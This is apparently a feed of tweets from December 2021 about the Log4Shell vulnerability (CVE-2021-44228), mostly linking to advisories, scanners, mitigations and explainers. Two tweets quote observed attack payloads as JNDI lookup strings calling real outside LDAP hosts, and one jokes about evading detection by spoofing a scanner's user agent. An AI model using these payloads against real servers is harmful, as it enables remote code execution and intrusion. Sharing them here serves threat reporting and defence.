2021-12-18 14:00:17java: Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes https://t.co/b2DadL2IUa https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlRSS_hateb_l_Roy
2021-12-18 13:52:42📦 CVE-2021-44228_scanner ⭐ 97 (+26) 🗒 PowerShell Scanners for Jar files that may be vulnerable to CV... https://t.co/dw8Jo1LIfb https://github.com/CERTCC/CVE-2021-44228_scannergh_trending_
2021-12-18 13:40:28Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/j4Kwdi3Cpx https://youtu.be/0-abhd-CLwQruisfda
2021-12-18 13:40:26CVE-2021-44228-Mitigation-Cheat-Sheet: Log4J CVE-2021-44228 : Mitigation Cheat Sheet https://t.co/Dn3Hh91A1Z https://github.com/thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheetnuria_imeq
2021-12-18 13:31:26The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/VoiDXMdSlg https://twitter.com/i/web/status/1472192844039430149gustavohfsilva
2021-12-18 13:08:25Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes https://t.co/efE3nIOlad https://ift.tt/3e22tqimagiauk
2021-12-18 13:00:23A finales de 2021 ha aparecido la #vulnerabilidad #Log4Shell (CVE-2021-44228). Hemos creado una herramienta de eva… https://t.co/PGaWKrffS5 https://twitter.com/i/web/status/1472189907581997070TrendMicroES
2021-12-18 12:57:17@floorter Er is daarnaast een *veel* sterkere focus op security by design nodig. CVE-2021-44228 komt primair door h… https://t.co/YJe6CAfPqo https://twitter.com/i/web/status/1472185351116570624stijnveilig
2021-12-18 12:50:21🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/qwfO8RoVY4 https://twitter.com/i/web/status/1472187276427816964threatintelctr
2021-12-18 12:44:24CVE-2021-44228に加えてCVE-2021-45046とかCVE-2021-45105が出てきて泥沼に……Takemaro_001
2021-12-18 12:42:30“Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes” https://t.co/8Ac8RG6rAv https://htn.to/22S1sVRUCFmodokey
2021-12-18 12:40:41Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/ov3e9aEQpR a través de @YouTube https://youtu.be/w2F67LbEtnkluigy0x18
2021-12-18 12:11:56Inside the Log4j2 vulnerability (CVE-2021-44228) https://t.co/UkylKiIj3E https://lnkd.in/dnBmA_q8profitnl
2021-12-18 12:01:35#Log4Shell: vulnerabilidad crítica con exploit para #Log4j 2 (PARCHEA YA!) - Actualizado CVE-2021-44228… https://t.co/EERug36sGR https://twitter.com/i/web/status/1472174083416621058RedySeguridad
2021-12-18 11:50:30🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/QJsmlEYaSz https://twitter.com/i/web/status/1472172176535171076threatintelctr
2021-12-18 11:31:03In terms of updating: #log4j #CVE-2021-45046 #CVE-2021-45105 #CVE-2021-44228 https://t.co/mHFdgF1e2btheDeallocated
2021-12-18 10:52:27Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability https://t.co/HDmRDRkvR6 #VMware… https://t.co/MbuIbNduXM https://dy.si/5qUiEzG https://twitter.com/i/web/status/1472152559678861314AzizAqeelVM
2021-12-18 10:51:49Log4JHunt An automated, reliable scanner for the #Log4Shell CVE-2021-44228 vulnerability. https://t.co/7fnHikD8Nv… https://t.co/xQY3PYQvUR https://github.com/redhuntlabs/Log4JHunt https://twitter.com/i/web/status/1472153765339930624hack_git
2021-12-18 10:51:17CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/ffhkAoCrzo 출처 @YouTube https://youtu.be/7qoPDq41xhQLuna_0x01
2021-12-18 10:35:18Simple vendor/product browser related to log4shell vulnerability Log4j CVE-2021-44228 and more https://t.co/o6Dy9TTvYR https://jla.ovh/log4shellApexAPI
2021-12-18 10:30:55log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/UeZaVxCxoM https://twitter.com/i/web/status/1472147795956142082the_yellow_fall
2021-12-18 10:28:38log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/GBo6pwro6M https://twitter.com/i/web/status/1472148525119008769AcooEdi
2021-12-18 10:15:25CVE-2021-44228: Staying Secure - Apache Log4j Vulnerability https://t.co/A1CGjeaMqA https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/TRILLIONCAP
2021-12-18 10:11:26JBoss Tools and Red Hat CodeReady Studio for Eclipse 2021-09 security fix release for Apache Log4j CVE-2021-44228 https://t.co/Qb5OTqxEYE https://ift.tt/3yEbjDRjbosstools
2021-12-18 10:02:35Arctic Wolf veröffentlicht das Log4Shell Deep Scan Tool, um sowohl CVE-2021-45046 als auch CVE-2021-44228 aufzuspür… https://t.co/86TtjftIw4 https://twitter.com/i/web/status/1472142240885743632PierreFlammer
2021-12-18 09:50:50@gatestone Kyllä. Log4shell (CVE-2021-44228) edelleen se ainut kriittinen. Tämä release sykli on hieman hämmentävä… https://t.co/yXQnaMPaOB https://twitter.com/i/web/status/1472140566821548036JuhoJauhiainen
2021-12-18 09:43:30Updated: !! Workaround instructions to address CVE-2021-44228 in #VMware vCenter Server and vCenter Cloud Gateway (… https://t.co/Bzp41vuOJC https://twitter.com/i/web/status/1472137160417497089arjanhs
2021-12-18 09:43:13Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/qbfCHU8qaZ https://dy.si/jgbVnmastr79
2021-12-18 09:22:18Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/pqxJaAQBcA https://youtu.be/w2F67LbEtnku_int32
2021-12-18 09:21:19#zookeeper: "Re: Impact of Log4J security vulnerability CVE-2021-44228 on zookeeper" https://t.co/7qYzX1Ezic https://ift.tt/3milau6ApacheZooKeeper
2021-12-18 09:21:08@AWS_Security @AWSSecurityInfo @awsforjava #Lambda update regarding #Log4J2 security issue CVE-2021-44228 update aw… https://t.co/tx7ymBnAFz https://twitter.com/i/web/status/1472134270164553731fpientka
2021-12-18 09:02:14GitHub - CERTCC/CVE-2021-44228_scanner: Scanners for Jar files that may be vulnerable to CVE-2021-44228 https://t.co/apa5l61T08 https://ift.tt/3yz8eoKmagiauk
2021-12-18 09:00:19Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 MSRC / By MSRC Team / December 11, 2021 Published on: 2021 De… https://t.co/qPfVTo3HnV https://twitter.com/i/web/status/1472129506651799555zimei_no_ri
2021-12-18 08:40:57#software [LiveOverflow]Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/1sLetIh7vQ https://t.co/9e5lwbzheZ https://youtu.be/w2F67LbEtnksoftwaremars
2021-12-18 08:40:24#fail2ban filter rule for the log4j CVE-2021-44228 exploit https://t.co/veVDzhuFxT - https://t.co/eJroamR8rr https://t.co/LaQbr67Fmk https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949 https://t.me/hackgit/2558hack_git
2021-12-18 08:40:20IPs #exploiting the #log4j2 CVE-2021-44228 detected by the crowdsec community https://t.co/BJOu5POYQW -… https://t.co/SxSSt4kjrU https://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166 https://twitter.com/i/web/status/1472123701684584448hack_git
2021-12-18 08:21:50Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 https://t.co/tdPx5QXNB6 https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlmiki158s
2021-12-18 08:21:28Log4J Vulnerability NVD - CVE-2021-44228 ⁦@NISTcyber⁩ ⁦@NIST⁩ #cloudsecurity #azurefamily… https://t.co/r9rSifnw4R https://twitter.com/i/web/status/1472116535032520712sukumarraju
2021-12-18 08:20:06今週お客様からお問合せをいただく件について、PMがさっとコーポレートサイトとプロダクト内にお知らせにアップしてくれました 「弊社サービスのApache Log4jの脆弱性(CVE-2021-44228)の影響について」 当社プ… https://t.co/nwJZnr46iH https://twitter.com/i/web/status/1472118358372134914mitsu_shimada
2021-12-18 07:43:39AWS services &amp; Log4j2 CVE-2021-44228 V6 2021/12/17 https://t.co/Du2G2KdSGw 🔹Services reported - 85 🔹Action Required… https://t.co/iTpkdR2gle https://aws.amazon.com/security/security-bulletins/AWS-2021-006/ https://twitter.com/i/web/status/1472108068351758338apple_rom
2021-12-18 07:38:30As CVE-2021-44228 picks up speed, here are some mitigation actions from Vulcan Cyber’s Lior Ben Dayan that you can… https://t.co/dy3thqSrpF https://twitter.com/i/web/status/1471914406430887939VulcanCyber
2021-12-18 07:32:16[Scheduled] Emergency Maintenance for CVE-2021-44228 - Zettagrid All Availability Zones: 18 Dec 16:25 AWST - Engine… https://t.co/cRIoJauw8L https://twitter.com/i/web/status/1472105190316720132ZettaOps
2021-12-18 07:22:42Quickest fastest explanation of how Log4J vulnerability works. Log4j (CVE-2021-44228) RCE Vulnerability Explained… https://t.co/drxEtNV6bK https://twitter.com/i/web/status/1472102769356115974rippledj
2021-12-18 07:12:02Log4j2 Vulnerability (CVE-2021-44228) Research and Assessment https://t.co/ni4CyY9k1M This blog relates to an ongoi… https://t.co/MFm0m5BJmE https://databricks.com/blog/2021/12/17/log4j2-vulnerability-cve-2021-44228-research-and-assessment.html https://twitter.com/i/web/status/1472099770172796929DataAugmented
2021-12-18 07:11:47Logback does NOT offer a lookup mechanism at the message level. Thus, it is deemed safe with respect to CVE-2021-44228.21stCenturyDays
2021-12-18 07:10:46wearing this as my entire unpatched infra gets fucking obliterated by CVE-2021-44228 https://t.co/pEgWGONjNN https://twitter.com/PureLifeEternal/status/1471778866452705283goatexpert
2021-12-18 06:41:14https://t.co/ZPpWzCnZBc #Lucene 8.11.1 Release Highlights: #Log4j is upgraded to v2.16.0 to mitigate CVE-2021-44228 (for Luke users Https://lucene.apache.org/core/downloads.htmlfpientka
2021-12-18 06:30:59Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/In3IfvVGYI https://dy.si/RwJF6aJSia09
2021-12-18 06:30:19CVE-2021-44228 Rocks the world by Log4j Critical Vulnerability Veirry's Explain: Bagi pengguna apache segeralah u… https://t.co/lH3NoL2dPC https://twitter.com/i/web/status/1472091671693193219VeirryA
2021-12-18 06:20:27#Microsoft’s Response to CVE-2021-44228 Apache #Log4j 2 #Log4Shell https://t.co/Jb8K1YJEnO https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/?WT.mc_id=AZ-MVP-5003620omiossec_med
2021-12-18 05:51:08CVE-2021-44228 gets a rare CVSS v3 score of 10. RCE exploits are the most dangerous exploitation type. This vulnera… https://t.co/LpRzXOhRTl https://twitter.com/i/web/status/1472076708891213827CswWorks
2021-12-18 05:23:49CVE-2021-44228 &amp; CVE-2021-45046 - Use AWS Services to protect, detect and respond! #aws #log4j #cve202144228… https://t.co/1njWN1vIL8 https://twitter.com/i/web/status/1472072430759952392anshumanch
2021-12-18 05:23:28Apache Log4j2 Vulnerability | CVE-2021-44228 | CVE-2021-45046 |Log4j 2.1... https://t.co/VE7tQeoFIF via @YouTube #cve202144228 #cve202145046 https://youtu.be/ziZnU3t-DRManshumanch
2021-12-18 04:41:45GitHub Trending Archive, 16 Dec 2021, Java. corretto/hotpatch-for-apache-log4j2, logpresso/CVE-2021-44228-Scanner,… https://t.co/IhJkFplYtb https://twitter.com/i/web/status/1472061603999023107motakasoft
2021-12-18 04:32:55#log4j #nmap Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts c… https://t.co/a10hwBO73T https://twitter.com/i/web/status/1472059625457471488IT_news_for_all
2021-12-18 04:30:18Excerpt: CVE-2021-44228 (and subsequently CVE-2021-45046) describe a security issue found in the Apache Log4j 2 Jav… https://t.co/WkbhoBmTbY https://twitter.com/i/web/status/1472061457265213442AWSBlogs
2021-12-18 04:20:44GitHub - back2root/log4shell-rex: PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs https://t.co/CXMA9o2wTk https://github.com/back2root/log4shell-rexkwestin
2021-12-18 04:12:18CVE-2021-44228 Impact of Log4j Vulnerability CVE-2021-44228 and CVE-2021-45046 (Severity: CRITICAL) -… https://t.co/JItXR8uK2k https://twitter.com/i/web/status/1472054395781230599CisoInvisible
2021-12-18 04:00:21"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeVMy9 Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-18 04:00:12Example CVE-2021-44228 payload: ${jndi:ldap://160.153.245.122:1234/TomcatBypass/TomcatEcho} Ports targeted: 443 14… https://t.co/HGknhuV69U https://twitter.com/i/web/status/1472054015441522688bad_packets
2021-12-18 03:30:39#Blue_Team_Techniques Nmap NSE scripts to check against log4shell/LogJam vulnerabilities (CVE-2021-44228) https://t.co/YzoxxWktE2 https://github.com/Diverto/nse-log4shellksg93rd
2021-12-18 03:20:39&gt; Xcode contains a copy of the log4j library that has the CVE-2021-44228 security vulnerability 意外なところにも影響が https://t.co/humay3xRWh https://developer.apple.com/documentation/xcode-release-notes/xcode-13_2_1-release-noteskymmt24
2021-12-18 02:52:33.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/XXwFHWBxpg https://twitter.com/i/web/status/1472034988556263429Woronka
2021-12-18 02:50:48@Cyber_O51NT NIST has given this vulnerability (CVE-2021-44228 aka #log4j) a score 10 out of 10, which reflects i… https://t.co/ZKhUGt8uoL https://twitter.com/i/web/status/1472036267332448259pflegedissens
2021-12-18 02:50:22Scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any… https://t.co/aIyRZ5Enex https://twitter.com/i/web/status/1472036382147325952ivangaravito
2021-12-18 02:21:46Here are the payloads we've seen associated with #Log4j #CVE-2021-44228 attacks - https://t.co/y1ThlYkDUj https://juni.pr/3sh46J4Mounirhahad
2021-12-18 02:03:22An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/aEMiOElsui https://twitter.com/i/web/status/1472021680344215554ProductCERT
2021-12-18 02:01:37Log4j(Log4shell/CVE-2021-44228)対策万全?MandiantのBAS製品で社内セキュリティ製品をチェックしてみた! https://t.co/HcDy00kGP1 https://mnb.macnica.co.jp/2021/12/log4jlog4shellcve-2021-44228.htmlMASA89434701
2021-12-18 01:43:08GitHub Trending Archive, 16 Dec 2021, Unknown. jas502n/Log4j2-CVE-2021-44228, PKUFlyingPig/Self-learning-Computer-S… https://t.co/enxQMrCBHd https://twitter.com/i/web/status/1472016302013579264motakasoft
2021-12-18 01:21:45#Botnet spreading using the #Java trustURLCodebase=false mitigation bypass for #log4j (CVE-2021-44228).InakMali
2021-12-18 01:03:09Just caught a botnet spreading using the Java trustURLCodebase=false mitigation bypass for log4j (CVE-2021-44228).… https://t.co/9zjLHhxQZi https://twitter.com/i/web/status/1472006566819745793MalwareTechBlog
2021-12-18 01:00:32CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/YMvrYStj5n https://twitter.com/i/web/status/1472008155106320390ka0com
2021-12-18 00:41:16Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes | JPCERTコーディネーションセンター公式ブログ https://t.co/Zz23UK1VC5 https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlseeker5084
2021-12-18 00:20:45🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/zIIhPW08k9 https://twitter.com/i/web/status/1471998534215892996threatintelctr
2021-12-18 00:10:22Arctic Wolf releases Log4Shell Deep Scan tool to enable detecting both CVE-2021-45046 and CVE-2021-44228 within nes… https://t.co/Ai3gaY3QKf https://twitter.com/i/web/status/1471995486009704450AWNetworks
2021-12-17 23:53:49Axio’s statement on the Log4J vulnerability (CVE-2021-44228) On Dec 9th, 2021, security researchers published a re… https://t.co/16QNFSHwRL https://twitter.com/i/web/status/1471989299847610370two_minwarning
2021-12-17 23:33:36"The log4j vulnerability tracked as CVE-2021-44228, has been abused by all kinds of threat actors from state-backed… https://t.co/WmGG7Rv1Al https://twitter.com/i/web/status/1471984043600146432TychronC
2021-12-17 23:30:17The end of 2021 saw the emergence of the ##Log4Shell (CVE-2021-44228) #vulnerability. We created a free assessment… https://t.co/XlKnyHZFjk https://twitter.com/i/web/status/1471986065288445955TrendMicroRSRCH
2021-12-17 23:20:16🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/mFar3iCsLE https://twitter.com/i/web/status/1471983432410570756threatintelctr
2021-12-17 23:16:01CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-17 23:15:46An update to GitHub’s response to Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046 https://t.co/CKZwq8hbBF https://t.co/l6RSKj6J1m https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/ https://twitter.com/GitHubSecurity/status/1470472001529778188GitHubSecurity
2021-12-17 23:10:59little friday reminder that the CVE-2021-44228 first-stage is good at lifting AWS credentials and keys... and that… https://t.co/fo6LAMRvcy https://twitter.com/i/web/status/1471980282479722497caseyjohnellis
2021-12-17 23:01:29Update for Apache Log4j2 Issue (CVE-2021-44228) https://t.co/jTHyeoRt89 https://aws.amazon.com/security/security-bulletins/AWS-2021-006/security_inside
2021-12-17 23:00:29CVE-2021-44228 is being actively exploited by a large number of actors. Attackers are actively working on evasions… https://t.co/N8LyrK1FI2 https://twitter.com/i/web/status/1471976647217795077joakinen
2021-12-17 22:32:12@vxunderground @TychoTithonus AFAIK we have three issues in the mix: Original Log4shell (CVE-2021-44228) -&gt; partial… https://t.co/VdGUzdKZJG https://twitter.com/i/web/status/1471968457545723908tklancer
2021-12-17 22:23:25すごい増え方 / “Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について | 警察庁 @police” https://t.co/5Mpvk5xydx https://htn.to/w4tuFs5rGJmodokey
2021-12-17 22:20:12#HCL #Knowledgebase CVE-2021-44228, Log4J 2 / Log4Shell Security Advisory for Notes, Domino, Verse, and Traveler… https://t.co/ydxDeDFoIX https://twitter.com/i/web/status/1471968375127646215domino_robot
2021-12-17 22:18:48Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) #log4j #vulnerability… https://t.co/j6ExFDWZtp https://twitter.com/i/web/status/1471963509869228041RH_ISAC
2021-12-17 22:17:37Important information about Log4Shell/Log4j (CVE-2021-44228) - Find out which products are affected, and how to upd… https://t.co/ljJ63NAwVT https://twitter.com/i/web/status/1471964168601415691opto22
2021-12-17 22:11:07New data and insights into Log4Shell attacks (CVE-2021-44228) https://t.co/VBa121cPQH https://www.fastly.com/blog/new-data-and-insights-into-log4shell-attacks-cve-2021-44228JRoosen
2021-12-17 22:04:40CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/3z9U0hPSTB via @YouTube https://youtu.be/7qoPDq41xhQcodingfreaks
2021-12-17 22:02:59CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked #infosec #infosecurity #cybersecurity #threatintel… https://t.co/rvNzsVxRzp https://twitter.com/i/web/status/1471961428366086147CyberIQs_
2021-12-17 22:00:44CISA #Log4j (CVE-2021-44228) #Vulnerability Guidance #Log4Shell #cybersecfutures https://t.co/AwsJGdgweF https://github.com/cisagov/log4j-affected-dbAArabojr
2021-12-17 22:00:12What a week it has been. Below is our response to the CVE-2021-44228 Apache #Log4j Remote Code Execution vulnerabil… https://t.co/4JFfYMcRoZ https://twitter.com/i/web/status/1471963411294654474Numecent
2021-12-17 21:53:27Ivanti's response to the #Apache #Log4J Vulnerability #CVE-2021-44228. Sign-in for further updates at:… https://t.co/v0j82EBIke https://twitter.com/i/web/status/1471958636360523782GoIvanti
2021-12-17 21:51:34⚠️ La vulnerabilidad CVE-2021-44228, conocida como #Log4Shell afecta a #Log4j, una biblioteca de Java que las grand… https://t.co/7zZ3aTQCuN https://twitter.com/i/web/status/1471959945037889541TotalsecMx
2021-12-17 21:42:30Example CVE-2021-44228 payload: ${jndi:ldap://185.202.113.81:13908/b} (🇦🇲/🇩🇪/🇳🇱)* Target port: 8080/tcp Source IP… https://t.co/nKKsTLCZKP https://twitter.com/i/web/status/1471957286935429120bad_packets
2021-12-17 21:20:45Moments like #Log4j CVE-2021-44228 highlight importance of #Cybersecurity community collaboration. Check out F5 DC… https://t.co/V6Kjlh6BKq https://twitter.com/i/web/status/1471953036679471108angelsgrant
2021-12-17 21:12:14Citrix Security Advisory for Apache CVE-2021-44228 and CVE-2021-45046 | https://t.co/A6eXrAXmYI https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-17 21:10:41The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/VfJ5TClC9k https://t.co/hCFDGkPOvV https://bit.ly/3sbYIa1annamsui
2021-12-17 20:51:37"The Log4j flaw (CVE-2021-44228), reported last week, is a remote code execution (RCE) vulnerability that enables h… https://t.co/q2Ku7n5ukz https://twitter.com/i/web/status/1471943568566542346swisstfrazer
2021-12-17 20:21:02@terraform_jp 書きました~。 CVE-2021-44228をブロックするAWS WAFをTerraformで作成する https://t.co/F4gruIX6ws https://qiita.com/yktr_sre/items/703090869fe154f32d51yktr_sre
2021-12-17 20:20:59Axio’s statement on the Log4J vulnerability (CVE-2021-44228) https://t.co/cysKZq5o0k https://securityboulevard.com/2021/12/axios-statement-on-the-log4j-vulnerability-cve-2021-44228/security_inside
2021-12-17 20:12:12VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046) https://t.co/WtFtIaZvy6 https://lnkd.in/dWR-CP3Bmelihozhan
2021-12-17 20:10:19Going to exploit CVE-2021-44228 et al but change my User Agent to "nessus" or "Pentester Don't Worry" or something similar to evade defense.jfslowik
2021-12-17 20:02:17何かでたらめな動画だなぁ… Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/3yn6rgyJgu @YouTubeより https://youtu.be/w2F67LbEtnkcock_star
2021-12-17 20:00:48Keeping up with log4shell aka CVE-2021-44228 | CSA https://t.co/b1xosD9cpF https://cloudsecurityalliance.org/blog/2021/12/16/keeping-up-with-log4shell-aka-cve-2021-44228-aka-the-log4j-version-2/UnctusM
2021-12-17 20:00:07Axio’s statement on the Log4J vulnerability (CVE-2021-44228) #infosec #infosecurity #cybersecurity #threatintel… https://t.co/LJbqKT0voF https://twitter.com/i/web/status/1471933211051802641CyberIQs_
2021-12-17 19:52:07Log4j 2.15.0 (CVE-2021-44228) has been identified as incomplete in specific non-default configurations. The vulnera… https://t.co/vh4rCsiS00 https://twitter.com/i/web/status/1471928687348101125CBIsecure
2021-12-17 19:52:01Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Protect Snapshot on Windows (CVE-2021-44228)… https://t.co/BP12gseOWp https://twitter.com/i/web/status/1471928763118239750L2clrogers
2021-12-17 19:51:33See a replay of yesterday's #log4j webinar to understand what CVE-2021-44228 is, why log4j is so dangerous, and how… https://t.co/QMReAiRhS0 https://twitter.com/i/web/status/1471929570282647557AWNetworks
2021-12-17 19:43:54Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/56eKjVAQBQ https://twitter.com/i/web/status/1471926180274180101F5Labs
2021-12-17 19:42:40After CVE-2021-44228 you do want to upgrade log2j in your local Solr instances... How to do this -&gt;… https://t.co/f6AWorqy4c https://twitter.com/i/web/status/1471926673692106761avwolferen
2021-12-17 19:42:34Even as the response and cleanup from Log4Shell (CVE-2021-44228) continues, we can learn from what happened and eme… https://t.co/jGFUChMtjP https://twitter.com/i/web/status/1471926755736780806F5
2021-12-17 19:42:22Even as the response and cleanup from Log4Shell (CVE-2021-44228) continues, we can learn from what happened and eme… https://t.co/OIkZP2GSo5 https://twitter.com/i/web/status/1471926854835589120F5Security
2021-12-17 19:21:59Las Instalaciones de AtoM 2 (Access to Memory) se han visto afectadas por la vulnerabilidad CVE-2021-44228 | Log4j… https://t.co/0FN4AvaE4g https://twitter.com/i/web/status/1471920995548246023culturalhosting
2021-12-17 19:21:43Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued https://t.co/vluIcqoeps https://bit.ly/3F8QjYmPav0ne
2021-12-17 19:21:24Une règle fail2ban contre la vuln log4j https://t.co/wE5PSZPUWm via @korben CVE-2021-44228 #Log4Shell https://korben.info/fail2ban-log4j.htmlargevise
2021-12-17 19:12:46Is RightFax susceptible to the Log4J vulnerability reported in CVE-2021-44228? https://t.co/dxwTRdgXQp https://t.co/IyVaMoeMqS https://bit.ly/30w4k3gRightFaxPros
2021-12-17 19:12:32Hot topic right now so invest a little time to catch our DC Connects show from today, Log4j CVE-2021-44228 Vulnerab… https://t.co/dCp1XpjETj https://twitter.com/i/web/status/1471918377816018952skubina123
2021-12-17 19:12:15Note: @Oracle Security Alert Advisory - CVE-2021-44228. #log4j https://t.co/CJsPGPRVY7 https://www.oracle.com/security-alerts/alert-cve-2021-44228.htmlakajiten
2021-12-17 19:11:52Updated! Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/RBboESUErR https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/RavivTamir
2021-12-17 19:11:43Two @linode CIDRs that have popped up a lot for me related to #Log4j #Log4Shell (CVE-2021-44228) scanning/exploitat… https://t.co/0Sc1Q8ufHD https://twitter.com/i/web/status/1471919339200725000BushidoToken
2021-12-17 19:00:41An update on the Apache Log4j CVE-2021-44228 vulnerability - IBM PSIRT Blog (https://t.co/81ebXOLeGi). Keep checki… https://t.co/m5rKJadaOv https://buff.ly/3m6WlBi https://twitter.com/i/web/status/1471917615929040900dtoczala
2021-12-17 19:00:17Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/KP6L1Yxw5S https://dy.si/TEpz7T2MikedelaTorre
2021-12-17 18:51:14Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Copy Data Management (CVE-2021-44228) https://t.co/5SSmbJh100 https://ibm.biz/BdfTyQL2clrogers
2021-12-17 18:51:07CVE-2021-44228 is the COVID in technology.IlyasShah04
2021-12-17 18:41:43A new and severe zero-day vulnerability (​​CVE-2021-44228), dubbed #Log4Shell, has been identified in the widely us… https://t.co/kLoJgKUbMD https://twitter.com/i/web/status/1471911070709256198alissaknight
2021-12-17 18:31:57@LiveOverflow did a nice video with detailled insights on CVE-2021-44228 aka Log4j https://t.co/MOGEIocy9t #CyberSecurity #log4j https://youtu.be/w2F67LbEtnkJan__Gilgan
2021-12-17 18:30:08Our investigation of the #Log4Shell (CVE-2021-44228) #vulnerability continues to ensure our customers are protected… https://t.co/3aW3oNHVYB https://twitter.com/i/web/status/1471910567187259393Avertium
2021-12-17 18:21:28A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 #CyberSecurity #log4j https://t.co/BerZ3Sbo2M https://github.com/fullhunt/log4j-scancybersecsloane
2021-12-17 18:21:20Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/zefJGGWS04 https://dy.si/PYAGKbViVarunVerma
2021-12-17 18:11:54Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/kx9L6IvIB3 https://dy.si/PLvJeTinaKrogull
2021-12-17 18:10:33#Log4Shell #VMware vCenter Server (CVE-2021-44228) - Hacking Tutorials https://t.co/2McgsvIDCz http://fuhs.eu/1f8aHfuhs
2021-12-17 18:10:28"Javaのログ出力ライブラリであるApache Log4jでゼロデイ脆弱[…]性「Log4Shell(CVE-2021-44228)」について、概念実証コードが[…]2021年12月10日に公開" "このLive4Shellを突… https://t.co/VAuhLnd0Iq https://twitter.com/i/web/status/1471904997839638528kamex
2021-12-17 18:01:01Kroll is helping several clients and organizations with CVE-2021-44228, the #Log4j vulnerabilities, and we've prepa… https://t.co/wBhuonc3hQ https://twitter.com/i/web/status/1471901775179431943KrollWire
2021-12-17 17:50:34Published in response to CVE-2021-44228, this playbook and its sub-playbooks can be used to investigate and respond… https://t.co/YXbvUthurP https://twitter.com/i/web/status/1471897992126861315MMShippy
2021-12-17 17:42:51How Kroll is Handling CVE-2021-44228 (#Log4J / #Log4Shell) with background, services to support those who need it o… https://t.co/FU9Nc3jFyH https://twitter.com/i/web/status/1471895635624407055aboutdfir
2021-12-17 17:42:39La vulnerabilidad, CVE-2021-44228, revelada el 9 de diciembre, permite el acceso remoto a servidores y la ejecución… https://t.co/caa59JEsZi https://twitter.com/i/web/status/1471895874896805888maferegas
2021-12-17 17:42:27How Kroll is Handling CVE-2021-44228 (Log4J / Log4Shell) https://t.co/Rap6UadWB2 https://www.kroll.com/en/insights/publications/cyber/how-kroll-is-handling-cve-2021-44228kirtanSec
